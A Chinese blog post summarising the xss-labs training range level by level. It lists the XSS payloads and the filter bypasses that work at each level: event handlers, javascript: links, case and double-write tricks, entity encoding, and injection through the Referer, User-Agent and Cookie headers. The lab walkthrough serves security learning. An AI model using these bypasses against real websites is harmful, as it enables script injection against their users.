xss-libs靶场总结

最新推荐文章于 2024-07-13 21:44:32 发布
最新推荐文章于 2024-07-13 21:44:32 发布
阅读量129 收藏
点赞数 4
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59023242/article/details/134606267
版权

xsslabs靶场解析

见框就插

  • 找框:输入框,搜索框

  • 插代码

第1关
<script>alert(1)</script>
第2关

语句:

<script>alert(1)</script>
  • 尝试闭合标签,成功
"> <script>alert(1)</script>
第3关

语句:

<script>alert(1)</script>
  • 发现标签被实体化
<input name=keyword  value='&lt;script&gt;alert(1)&lt;/script&gt;'>
  • 尝试使用事件,成功
'οnfοcus=alert('xss') '
第4关

语句:

<script>alert(1)</script>
  • 发现<,>被吃掉了(尖括号过滤)
<input name="keyword" value="scriptalert(1)/script">
  • 尝试使用事件,成功
"οnfοcus=alert('xss') "
第5关

语句:

<script>alert(1)</script>
  • 发现<script ==> <scr_ipt
<input name="keyword" value="<scr_ipt>alert(1)</script>">
  • 尝试使用事件,发现也被过滤 on ==> o_n
"οnfοcus=alert('xss') "

<input name="keyword" value="" o_nfocus="alert('xss')" ""="">
  • 尝试使用伪协议,成功
"> <a href=javascript:alert(1)>aaa</a>
第6关

语句:

<script>alert(1)</script>
  • 发现<script ==> <scr_ipt
<input name="keyword" value="<scr_ipt>alert(1)</script>">
  • 尝试使用事件,发现也被过滤 on ==> o_n
"οnfοcus=alert('xss') "

<input name="keyword" value="" o_nfocus="alert('xss')" ""="">
  • 尝试使用伪协议,也被过滤href ==> hr_ef
<a hr_ef="javascript:alert(1)">aaa</a>
  • 尝试大小写绕过,成功
"><ScRiPt>alert(/xss/)</sCrIpT>
第7关

语句:

<script>alert(1)</script>
  • 发现,script被过滤了
<input name="keyword" value="<>alert(1)</>">
  • 尝试双写绕过,成功
"><scriscriptpt>alert(1)</scriscriptpt>
第8关

语句:

<script>alert(1)</script>
  • 发现<script ==> <src_ipt ,且参数在a标签中
<a href="<scr_ipt>alert(1)</scr_ipt>">友情链接</a>
  • 尝试使用伪协议,发现也被过滤了
javascript:alert(1)

<a href="javascr_ipt:alert(1)">友情链接</a>
  • 尝试其他标签,发现参数src以及 on也被过滤了(事件也无法使用)
<a href="<img sr_c=# o_nerror=alert(1)>">友情链接</a>
  • 尝试使用unicode编码(href的隐藏属性自动Unicode解码),成功
javascript:alert()
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;
第9关

语句:

javascript:alert(1)
  • 插入之后,发现参数没有插入成功,而是说链接不合法
<a href="您的链接不合法?有没有!">友情链接</a>
  • 查看源代码,发现,当我们传入的参数中,没有包含http://时,参数无法插入成功
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
  • 尝试加入http://进行测试,发现参数可以正常传递,但是关键字被过滤(其他关键字也被过滤,自行尝试或查看关卡源代码)
<a href="javascr_ipt:alert(1)http://">友情链接</a>
  • 尝试unicode编码,发现成功绕过,但是有http://存在,无法成功执行payload
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;http://


<a href="javascript:alert(1)http://">友情链接</a>
  • 尝试注释掉http://,成功
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;/*http://*/

注释符号:/**/

关键点:

  • unicode编码

  • 绕过http:// 并注释

第10关

语句:

<script>alert(1)</script>
  • 发现没有效果,查看源代码发现有猫腻,真正传参的地方被隐藏了
<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
  • 在url栏进行真正的参数测试,发现只有t_sort能传递参数,但是<>被过滤了
t_link:         <script>alert(1)</script> 
t_history:      <script>alert(1)</script> 
t_sort:         <script>alert(1)</script> 

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="scriptalert(1)/script" type="hidden">
  • 尝试事件并构造闭合,成功
?t_sort=" οninput=alert(1) type="text

这里的type="text,是为了使hidden属性失效而构造的,
也是为了方便我们执行oninput事件

关键点:

  • 隐藏框:hidden

  • 传参点:t_sort

  • 过滤点:< >

第11关

查看源代码发现,在t_ref处有http协议头中的referer参数传递

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
<input name="t_ref"  value="http://localhost:7036/xss_labs/www.xss.com/level10.php?t_sort=%22%20οninput=alert(1)%20type=%22text" type="hidden">

  • 先判断,其余3个参数能否传参

    • 发现只有t_sort能够传递参数

  • 尝试t_sort,发现"被实体化,尝试编码绕过,也不行

?t_sort=" οninput=alert(1) type="text
<input name="t_sort"  value="" onfocus=alert(1) type="text" type="hidden">

?t_sort=&#34;%20οninput=alert(1)%20type=&#34;text
?t_sort=&#34;&#32;&#111;&#110;&#102;&#111;&#99;&#117;&#115;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#32;&#116;&#121;&#112;&#101;&#61;&#34;&#116;&#101;&#120;&#116;
<input name="t_sort"  value="" type="hidden">
  • 尝试我们最开始发现的t_ref;由于其value值为http协议头,我们使用抓包工具,在第10关成功之时抓包,使用referer头进行测试
  • payload:user=" οnfοcus=alert(1) type="text

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 修改之后放掉此包,成功
    在这里插入图片描述

关键点:

  • 传参方式改变,从一般的get,post传参变为了http协议中referer头传参
第12关

思路与第11关一致

关键点:

  • 参数传递方式:http协议中的ua头传参
  • payload:" οnfοcus=alert(1) type="text
    在这里插入图片描述
第13关

思路与第11关一致

关键点:

  • 参数传递方式:http协议中的cookie传参
    • payload:user=" οnfοcus=alert(1) type="text

在这里插入图片描述

第15关

查看网页源代码,发现了

<body><span class="ng-include:"></span></body>

  • 利用的是文件包含

  • js里面的ng-include和php里面include,一样的作用

方法:

  • 想办法包含其他关卡,进行弹框

  • 包含第2关,get传参,用经典xss代码发现被实体化,再尝试用事件型

  • payload:?src=‘level2.php?keyword=as" οnfοcus="alert(1)’

第16关

经过测试:

  • 发现过滤了script
  • 大小写,双写都不行
  • 尝试其他标签,发现空格被过滤 ==> 实体化
  • /也被转换为了 空格(&nbsp;

方法:

  • 绕过空格,换行%0a替代空格
  • payload:
    • <img%0asrc=123%0aοnerrοr=alert(1)>
    • <svg%0asrc=123%0aοnerrοr=alert(1)>
灮迦
关注
xsslibs大详解
gankjk的博客
10-31 875
level1 我没问查看发现,他提交了一个name参数,并且值为test,长度为4. 我们直接在name参数插入代码测试:<script>alert(1)</script> 我们查看一下源码 echo "<h2 align=center>欢迎用户".$str."</h2>";这里没有过滤直接输出接收到的字符串,那么用户恶意输入,当然也会执行,所以构成了xss漏洞。 level2 我们直接插入代码试试<script>aler...
2021-11-15-xss-labs上
qq_50963064的博客
11-15 306
xss-labs靶场安装 首先还是要有phpstudy,这个就不说了。 然后下载靶场: 地址:https://github.com/do0dl3/xss-labs 将靶场解压到phpstudy的www目录下,访问就好了。 xss-labs 1~10 level-01 根据图标点击进入xss之旅: 可以看到有get请求,参数为name,可进行输入,并将输入内容显示于页面。 http://127.0.0.1/xss-labs-master/level1.php?name=test 可以看到这里的输入内容
xss-labs靶场总结(持续更新)
<XiaoHai>的博客
06-17 317
web安全
XSS-labs 靶场通关总结(下)
m0_61506558的博客
08-12 389
原理。
新手打 XSS-level(1-13) 靶场心得和总结
最新发布
m0_73992753的博客
07-13 1089
新手学习 XSS-level(1-13)练级
xss-labs靶场通关总结
weixin_62621015的博客
02-08 249
xss-labs靶场实战总结(其实没有完全通关:( ),我边过关边打的word文档,顺手贴上来。 本人也只是出于兴趣学习一下这方面的知识,文章涉及的知识点难免有些错漏,望海涵
centos7.6安装docker并搭建sqli-labs靶场
weixin_50644728的博客
10-14 696
Docker & VMware 1.Docker :是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口。(摘自百度百科) 2.与vmware的区别: VMware是在宿主机器操作系统的基础上创建的从操作系统。需要几个相互隔离的应用,就需要启动几个虚拟机,会消耗大量CPU和内存。 docker在宿主机的操作系统上创建docker引擎,直接在宿主机操作系统上调用硬件资源
渗透测试练习靶场汇总
zz12345600354的博客
05-02 256
Vulfocus 官网:在线演示:2.BUUCTF在线评测writeup文章:https://github.com/niudaii/my-vulstack-wphttps: //
sqli-labs第二十四关(二阶注入)
qq_42266432的博客
09-03 997
进入第二十四关,这关叫二阶注入,二阶注入个人感觉和存储型xss有些类似,大致分为以下几步: 攻击者在HTTP请求中提交恶意代码(可以是sql,js脚本等)。 应用将输存储在数据库以便后面使用并响应请求。 攻击者提交其他请求。 为处理其他请求,应用会检索已经存储的输入并处理它,从而导致攻击者注入的恶意代码被执行。 先去看看源码: login.php 中mysql_real_escape_string()函数可以转义 SQL 语句中使用的字符串中的特殊字符,无法注入 login_crea
浅谈JSONP跨域漏洞
weixin_39664643的博客
10-11 2848
浅谈JSONP跨域漏洞 CSRF(Cross site request forgery)跨站请求伪造,一种挟持用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法,跟XSS相比,XSS 利用的是网站对用户的信任,CSRF 利用的是网站对用户网页浏览器的信任。 提起CSRF,可能很多人都会想到修改个人资料、授权登陆等等攻击场景,可以发现这两个场景都是写入型的CSRF漏洞,通常会忽视更常见的读取型的CSRF漏洞,主流如下两种 JSONP跨域资源读取 CORS跨域资源读取 当持有敏感资源数据的服务器没
xssgame靶场通关记录
qq_43936524的博客
02-04 655
靶场地址 国光老师修改以后的项目地址 解压后放入HTTP服务的目录下,浏览器打开。 第一关 没有任何防护 payload: <script>alert('xss')</script> 第二关 测试语句: <>"JavAScriPT'/:on; 查看网页源码: 没有找到和&lt;&gt;&quot;JavAScriPT'/:on;相关的结果. 输入的字符串经过htmlspecialchars($str)编码,< > "被转义为html
跨站脚本攻击XSS(最全最细致的靶场实战)
热门推荐
m0_51468027的博客
01-31 4万+
一、XSS跨站漏洞 (1)XSS简介   网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting,安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS)有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。恶意攻击者会在 Web页面里插入恶意Script代码,当用户浏览该页之时,嵌.
xss实验并对注入点、注入语句及危害知识总结
五分之一世纪
03-25 1792
<1>xss的概念 xss的英文名字是cross site script。俗称跨站脚本,是一种注入攻击,指攻击者在被攻击的网页上利用编写时的漏洞注入恶意脚本代码,受害者访问该页面时,恶意代码会在用户的浏览器上执行的攻击方式叫做跨域脚本攻击。看xss的名字——“跨域脚本攻击”,思索名字可以发现“跨域”,那么什么是域?跨了什么域?其实这个域是指域名,在web中规定脚本只能在本域名上的不同路径上的文件中执行,而不能在不同域上执行,这个措施的实现就是根据同源策略。下面先用一个实验对xss的攻击流程做一个
XSS-Libs通关详解
henghengzhao_的博客
10-24 1450
开局先看到了get参数,而且和图片上面显示的一模一样我们可以试试这里是不是可以进行xss注入修改get参数: 通关看见输入框就得暗自一笑,特别是正上面还有它的输出(不知道是不是,是不是试试就知道是不是了呗)反手一个 闹着玩呢,上面正常回显了,但是没执行,我们查看源码,看看是不是哪被过滤了源码如下: 眼尖的小伙伴已经看到了,回显位被过滤掉了,过滤了,具体是怎么过滤的呢htmlspecialchars()函数balabala这么多,总之我们理解一个意思即可:就是把< > ’ "
[ XSS-labs通关宝典 ] xss-labs 通关宝典之 less1 - less5
qq_51577576的博客
12-31 587
[ XSS-labs通关宝典 ] xss-labs 通关宝典之 less1 - less5
XSS-labs详解
ytdd66的博客
03-23 2835
进入靶场点击图片,开始我们的XSS之旅!
web靶场——xss-labs靶机平台的搭建和代码审计
weixin_51525416的博客
09-05 5875
web靶场-xss-labs靶机平台的搭建和代码审计
xss靶场挑战之旅总结
weixin_43027842的博客
02-10 3947
第一关: 没有做任何的过滤 我们试下 第二关: 我们用&quot;&amp;gt; 有转义 参考HTML的转义 输入的 &quot; &amp;gt; &amp;lt; 被做了转义处理,变成了&quot;&amp;gt;&amp;lt; 我们用javascript里边的oninput事件试试 我们用12’ oninput='alert(12) 第四关; 做了过滤 用&quot;oninput=&q
xss-labs靶场打靶记录
AnistonH的博客
11-26 1667
(小声说一句,这部分也是偷的)检测输入变量,确认每个 web 页面中用户可自定义的变量,如 HTTP 参数、POST 数据、隐藏表单字段值、预定义的 radio 值或选择值分别确认每个输入变量是否存在 xss漏洞。变量输入处输入 poc,查看返回的 web页面的 html 中 poc 代码是否被过滤,浏览器是否响应 poc,若存在过滤,进行测试查看能否进行绕过。攻:利用<>标记,构造<script>标签可执行 javascript的xss代码。防:xss过滤函数需过滤等字符。
XSS-Labs靶场教程:一键部署、轻松入门
资源摘要信息:"xss-labs靶场是一个针对跨站脚本攻击(XSS)的学习和实践平台。它被设计成一系列的挑战关卡,每个关卡都包含有源码,供学习者分析和攻击。通过实际操作这些关卡,学习者可以对XSS攻击的原理、种类和...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值